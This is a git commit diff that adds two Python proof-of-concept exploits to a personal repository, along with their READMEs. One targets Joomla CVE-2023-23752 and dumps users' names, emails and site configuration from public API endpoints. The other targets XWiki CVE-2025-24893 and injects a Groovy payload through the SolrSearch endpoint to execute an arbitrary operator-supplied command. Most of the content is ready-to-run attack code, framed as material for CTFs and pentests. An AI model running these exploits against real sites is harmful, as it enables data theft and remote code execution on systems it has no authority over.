Merge pull request #1 from 0xVoodoo/reformat

Reformat the repo to store all my PoCs and add CVE-2025-24893
2025-08-18 13:58:33 -06:00
parent 14c0141694 9788148d65
commit 07b56e0cdf
5 changed files with 179 additions and 22 deletions
@@ -0,0 +1,76 @@
+import requests
+import json
+import argparse
+
+class User:
+    def __init__(user, name, email, lastvisitDate, groupNames):
+        user.name = name
+        user.email = email
+        user.lastvisitDate = lastvisitDate
+        user.groupNames = groupNames
+    
+    def __str__(user):
+        return f"Username: {user.name}\nEmail: {user.email}\nLast Visit: {user.lastvisitDate}\nGroups: {user.groupNames}"
+
+def vulnCheck(tgt):
+    verUrl = tgt + "/administrator/manifests/files/joomla.xml"
+    verData = requests.get(verUrl)
+    if len(verData.text) == 0 or "404" in verData.text.lower() or "403" in verData.text.lower():
+        print("[-] Site does not appear to be vulnerable!")
+        raise SystemExit
+
+def getUsers(tgt):
+    usrUrl = tgt + "/api/index.php/v1/users?public=true"
+    usrData = requests.get(usrUrl)
+    if "404" in usrData.text.lower() or "403" in usrData.text.lower():
+        print("[-] Error fetching user data, site may not be vulnerable")
+        raise SystemExit
+    parsedUsrs = json.loads(usrData.text)
+    return parsedUsrs
+
+def parseUsers(usrData):
+    users = []
+    for user in usrData["data"]:
+        userAtribs = user["attributes"]
+        newUser = User(userAtribs["username"],
+                       userAtribs["email"],
+                       userAtribs["lastvisitDate"],
+                       userAtribs["group_names"] )
+        users.append(newUser)
+    return users
+
+def getConfig(tgt):
+    cfgUrl = tgt + "/api/index.php/v1/config/application?public=true"
+    cfgData = requests.get(cfgUrl)
+    if "404" in cfgData.text.lower() or "403" in cfgData.text.lower():
+        print("[-] Error fetching user data, site may not be vulnerable")
+        raise SystemExit
+    parsedCfg = json.loads(cfgData.text)
+    return parsedCfg
+
+    
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(prog='Joomla Info Disclosure CVE-2023-23752', description='This is a PoC for CVE-2023-23752, an information disclosure vulnerability in Joomla < 4.2.8', epilog='Written by 0xVoodo')
+    parser.add_argument('-t', '--target', required=True, help='Target IP/URL')
+    args = parser.parse_args()
+
+    tgt = args.target.lower()
+
+    if tgt[4] != "http" and tgt[5] != "https":
+        print("[*] No URL schema specified, defaulting to HTTP")
+        tgt = "http://" + tgt
+
+    vulnCheck(tgt)
+
+    print(f"\n[+] User data found!") 
+    print("----------")
+    for user in parseUsers(getUsers(tgt)):
+        print(user)
+        print("----------")
+    
+    print(f"\n[+] Config data found!")
+    print("----------")
+    for i in getConfig(tgt)["data"]:
+        print(i["attributes"])
+
@@ -0,0 +1,27 @@
+# CVE-2023-23752 - Joomla Information Disclosure
+
+Yo, I needed to use this exploit in a HTB machine and the only other PoC I could find was written in ruby...
+
+I didn't wanna mess with the ruby dependancies so I just re-wrote it in python "real quick".
+
+---
+This is basically just a parser for the JSON returned by the open API endpoints, this can be replicated easily with CURL or a web browser by hitting the following endpoints:
+
+#### User Info
+
+`/api/index.php/v1/config/applicaton?public=true`
+
+#### Config Info
+
+`/api/index.php/v1/config/application?public=true"`
+
+## Usage
+`python3 CVE-2023-23752.py -t <target_url>`
+
+---
+
+
+# License
+GPL v3.0 - as all good software should be
+
+Remember - don't be a skid :)
@@ -0,0 +1,59 @@
+import requests
+import argparse
+import urllib.parse
+
+# Pretty colors :)
+RED = "\033[31m"
+GREEN = "\033[32m"
+YELLOW = "\033[33m"
+BOLD = "\033[1m"
+RESET = "\033[0m"
+
+def testVuln(target):
+    try:
+        resp = requests.get(target)
+    except requests.exceptions.RequestException as error:
+        print(f"{BOLD}{RED}[-]{RESET} Error connecting to host!")
+        raise SystemExit(error)
+
+    if "xwiki" not in resp.text.lower():
+        print(f"{BOLD}{RED}[-]{RESET} Error, site does not appear to be using XWiki")
+        return False
+    else:
+        return True
+
+def exploit(target, cmd):
+    payload = urllib.parse.quote(f'}}}}{{{{async async=false}}}}{{{{groovy}}}}"{cmd}".execute(){{{{/groovy}}}}{{{{/async}}}}')
+    exploitUrl = f'{target}/xwiki/bin/get/Main/SolrSearch?media=rss&text={payload}' 
+    try:
+        print(f"{BOLD}{YELLOW}[*]{RESET} Attempting exploit!")
+        resp = requests.get(exploitUrl)
+    except requests.exceptions.RequestException as error:
+        print(f"{BOLD}{RED}[-]{RESET} Site may not be vulnerable, or is unreachable!")
+        raise SystemExit(error)
+    print(f"{BOLD}{GREEN}[+]{RESET} Request successful, check for exploitation!")
+
+
+if __name__ == "__main__":
+    
+
+    parser = argparse.ArgumentParser(prog='CVE-2025-24893.py',
+                                     description='This is a PoC for CVE-2025-24893, a remote code execution vulnerability in XWiki',
+                                     epilog='PoC by 0xVoodoo - Don\'t be a skid :)' )
+    parser.add_argument('-t', '--target', required=True, help='Target IP/URL')
+    parser.add_argument('-c', '--command', required=True, help='Command to execute')
+    args = parser.parse_args()
+
+    print(f"{BOLD}{YELLOW}[*]{RESET} CVE-2025-24839 PoC by 0xVoodoo")
+    
+    tgt = args.target.lower()
+    if tgt[4] != "http" and tgt[5] != "https":
+        print(f"{BOLD}{YELLOW}[*]{RESET} No URL schema specified, defaulting to HTTP")
+        tgt = 'http://' + tgt
+
+    if testVuln(tgt):
+        exploit(tgt, args.command)
+    else:
+        raise SystemExit()
+
+
@@ -0,0 +1,11 @@
+# CVE-2025-24893 - XWiki RCE
+
+This vuln stems from improper user input sanitization when passing SolrSearch queries. Arbitrary groovy code can be executed due to a direct evaluate() call.
+
+The vulnerable endpoint here is:
+`/xwiki/bin/get/Main/SolrSearch?media=rss&text=`
+
+# License
+GPL v3.0 - as all good software should be
+
+Remember - don't be a skid :)
@@ -1,27 +1,11 @@
-# CVE-2023-23752 - Joomla Information Disclosure
+# PoCs

-Yo, I needed to use this exploit in a HTB machine and the only other PoC I could find was written in ruby...
+This repo contains proof of concept exploits for vulnerabilities I've come across in pentests and CTFs. This goes without saying but I am not liable for any misuse of these scripts, please be responsible.

-I didn't wanna mess with the ruby dependancies so I just re-wrote it in python "real quick".
-
---
-This is basically just a parser for the JSON returned by the open API endpoints, this can be replicated easily with CURL or a web browser by hitting the following endpoints:
-
-#### User Info
-
-`/api/index.php/v1/config/applicaton?public=true`
-
-#### Config Info
-
-`/api/index.php/v1/config/application?public=true"`
-
-## Usage
-`python3 CVE-2023-23752.py -t <target_url>`
-
---

+# Exploits
+- [CVE-2023-23752](https://github.com/0xVoodoo/PoCs/CVE-2023-23752) - Information disclosure in Joomla CMS.
+- [CVE-2025-24893](https://github.com/0xVoodoo/PoCs/CVE-2025-24893) - RCE in XWiki.

 # License
-GPL v3.0 - as all good software should be
-
-Remember - don't be a skid :)
+GPLv3 as all good software (or exploits I guess) should be.